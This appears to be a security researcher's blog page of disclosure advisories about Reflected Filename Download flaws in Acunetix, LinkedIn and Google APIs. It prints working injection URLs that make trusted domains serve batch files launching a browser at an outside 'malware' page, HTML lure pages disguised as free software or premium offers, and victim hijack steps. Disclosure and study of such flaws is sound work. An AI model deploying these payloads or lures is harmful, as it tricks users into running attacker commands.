David Sopas – Web Security Researcher

rfd

23/09/15 Advisories # , , ,

Acunetix got RFDed!

Acunetix got RFDed!

After publishing a report on a security software – OWASP ZAP – I found another vulnerability on a security company – Acunetix.
Reminds the proverbial saying:

Shoemaker’s son always goes barefoot.

I found a way to trick users into downloading a batch [executable] file that comes from ovs.acunetix.com using a Reflected Filename Download vulnerability.
It was funny how I found this one. I noticed that Acunetix allowed to test vulnerabilities online and I was curious about that web appplication. I register for a demo account and noticed lot’s of XHR requests on my Google Inspector. So I decided to give RFD a try…

This security issue affected almost all XHR requests on ovs.acunetix.comAcunetix Online Vulnerability Scanner. Every request allowed a user to inject a callback with special characters that would allowed me to launch a possible attack.

Take this example:

https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||

Which reflects on the screen:

start chrome davidsopas.com/poc/malware.htm||({“message”: “get:sgn:invalid size”, “data”: null, “error”: “bad-input”});

It didn’t give any HTTP error:

Request URL:https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
Request Method:GET
Status Code:200 OK
Remote Address:54.209.55.15:443

So I was able to inject a callback that even giving an error on the JSON information it didn’t return a HTTP error.

Because I couldn’t control the filename and force a download I needed to use the HTML5 download attribute.

<div align="center"> 
 <a href="https://ovs.acunetix.com/rpc/reports/count?sgn=1&callback=start chrome davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;">
 <img src="https://www.davidsopas.com/poc/Acunetix_1.jpg" border="0" />
 </a> 
 <h1>Download Acunetix Web Security Scanner for Free!</h1> 
 <p><i>(Use "Save link as" to download the file)</i></p> 
</div>

As I said before it happened in almost every XHR requests:

https://ovs.acunetix.com/rpc/scans/count?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/scans/list?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||
https://ovs.acunetix.com/rpc/licenses/get?sgn=1&callback=start%20chrome%20davidsopas.com/poc/malware.htm||

Possible attack scenario:
Because this file can be accessed without authentication a malicious user could use this to attack any user.

  1. Malicious user creates a specially crafted page – similar to my proof-of-concept – promising to download Acunetix web security software.
  2. Victims clicks to download the file [even if the victim checks the source-code of the page they would see the trusted source – acunetix.com]
  3. Victims runs the file and gets hijacked

Acunetix security team fixed this vulnerability very fast proving that they’re on top of things. I wish I could to see other companies follow Acunetix patching timeline.

Timeline:

17-09-2015 Reported to Acunetix
17-09-2015 Acunetix acknowledged the vulnerability
18-09-2015 Acunetix informed me that they fix this security issue
22-09-2015 Full disclosure

one response
18/09/15 Advisories # , ,

Linkedin Reflected Filename Download

Linkedin Reflected Filename Download

When researching another website I discovered a XHR request on my Google Inspector on Linkedin that seemed interesting:

https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt

Basically it was the request made by websites to count how many shares their site have on Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:

https://www.linkedin.com/countserv/count/share?url=”||calc||

Which returned:

IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});

Url parameter wasn’t validated and it was reflected on the JSON file.
If I downloaded the file and renamed it to .bat it executed the calculator from Windows.
But this is not enough I needed to change the path so it downloads a batch file and use a different windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||

Guess what? IE8 downloaded automatically this batch file from a trusted domain – linkedin.com
I wanted to work with other browsers so I needed HTML5 download attribute.

<div align="center"> 
<a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a> 
<h1>Linkedin Premium account!</h1> 
<p><i>(Use "Save link as" to download the file)</i></p> 
</div>

linkedin_rfd_chrome

So a possible attack scenario would be:

  1. 1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
  2. Victim clicks the link and trusting where it came from (Linkedin) he downloads it
  3. Victim runs the file and his computer it’s hijacked

A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on Linkedin.

To the victim, the entire process looked like a file is offered for download from Linkedin original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.

Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.

Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 Didn’t understand the true nature of the attack
11-05-2015 I replied with more information using other public RFD attacks and Oren Hafif paper about RFD
13-05-2015 Linkedin told me that they’re working in a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fix the issue
18-09-2015 Full disclosure

3 responses
10/09/15 Advisories # , ,

Google Reflected Filename Download

Google Reflected Filename Download

I found a critical issue on Google that can be used by malicious users to hijack victims computer using Google domain as platform and trust source.

I come across this security issue because I detected a JSON request using Google Inspector made by the following URL:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=xss&num=5&_=1439709781835

After checking that callback variable could be reflected on the screen I tried the following GET request:

https://www.googleapis.com/customsearch/v1?callback=calc&key=&cx=&q=xss&num=5

Which returns the following JSON information:

// API callback
calc({
"error": {
"errors": [
{
"domain": "usageLimits",
"reason": "keyInvalid",
"message": "Bad Request"
}
],
"code": 400,
"message": "Bad Request"
}
}
);

It returns HTTP status code 200 even when the JSON request tells that’s an error (?). In this case callback only allows a command to be executed without spaces so in the following proof-of-concept I could execute calc from Windows.

But I wanted a better and more exploitable proof-of-concept so I tried with the query parameter – “q”:

https://www.googleapis.com/customsearch/v1?callback=jQuery17109823856276925653_1439708781699&key=AIzaSyCMGfdDaSfjqv5zYoS0mTJnOT3e9MURWkU&cx=014141993897103097974%3A46gdqg1e99k&q=%22%7C%7Cstart+chrome+davidsopas.com%2Fpoc%2Fmalware.htm%7C%7C&num=5

Which returned:

"title": "Google Custom Search - \"||start chrome davidsopas.com/poc/malware.htm||",
"searchTerms": "\"||start chrome davidsopas.com/poc/malware.htm||",

The attack is reflected. Due to the fact that I couldn’t control the filename and force a download I needed to use HTML5 vector supported by the following browsers:

  • Chrome
  • Opera
  • Android Browser
  • Chrome for Android
  • Firefox

Online proof-of-concept  (downloads batch file that a new Chrome window with a URL – in my PoC is just text):

google_rfd3

google_rfd2

This works mostly on all Microsoft Windows versions. It also can be used in Linux and OSX but it needs more user interaction. For multi-plataform a malicious user could create a .htm file instead of a .bat file being the HTML file malicious. This is might be an alternative attack method to work with all operating systems.

So in my proof-of-concept I was able to execute a new window on Chrome browser with a page that simulates malware [it’s just text].

A malicious user could:

  1. Launch a malicious campaign with the specially crafted page providing Google offers – similar to my proof-of-concept
  2. Victim downloads the file thinking that is from a trusted domain [googleapis.com]
  3. Malicious user gains control over victims machine

How to fix this issue?
Google already fixed most of these issues by using HTTP header Content-disposition:attachment; filename=”f.txt” that will force the download to f.txt every time. But this time they decided not to fix it because they say that needs to many user interaction.

no responses
03/08/15 Advisories # , ,

Desk.com Reflected Filename Download

Desk.com Reflected Filename Download

Who is Desk.com?

Salesforce Desk.com help desk software offers small businesses an all-in-one customer service software solution that will help keep customers happy and loyal. Desk.com can be set up in just hours, and provides multi-channel support, including phone, email, self-help pages, and social media. Not only will this innovative help desk software let your agents more easily serve customers, your small business will have the insights needed to build better products and make smarter, growth-driving decisions.

– in http://www.salesforce.com/desk/overview/

Who uses Desk.com?

Continue reading

no responses
03/08/15 Swag # , ,

Mixpanel gave me a cool Tshirt

Mixpanel gave me a cool Tshirt

When I help companies to fix security issues I do not ask anything in return.

I come across a security issue on Mixpanel when auditing private client on Cobalt.io and I send to Mixpanel a little security advisory describing a Reflected Filename Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.

Continue reading

2 responses